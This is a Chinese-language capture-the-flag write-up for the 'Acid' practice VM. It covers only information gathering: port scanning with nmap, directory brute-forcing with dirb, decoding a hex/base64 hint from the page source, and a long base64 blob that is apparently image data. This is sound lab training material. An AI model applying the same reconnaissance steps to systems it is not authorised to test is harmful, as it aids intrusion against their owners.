Acid靶机实战
0x00 环境
靶场环境:Vmware虚拟机 ubuntu系统
攻击环境: kali、windows
网络环境: NAT模式
IP: 192.168.190.130
0x01 信息收集
nmap 扫描开放端口,开放一个端口33447,运行web服务
老规矩上扫描器。。。
Apache:2.4.10
查看源代码发现一个/images/bg.jpg,图片目录,似乎没有什么信息
对首页F12发现一串十六进制0x643239334c6d70775a773d3d
十六进制还原后d293LmpwZw==,base64解密后wow.jpg
。。。没啥信息。。
dirb跑出一个/images/Thume.db,用c32看了一波,发现有这些数字,不知道是啥,先记录一下。
456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
哈哈哈,柳暗花明又一村啊,习惯性点翻译中文,发现图片上面还有有字,检查一波看了一下,发现有一串base64的编码
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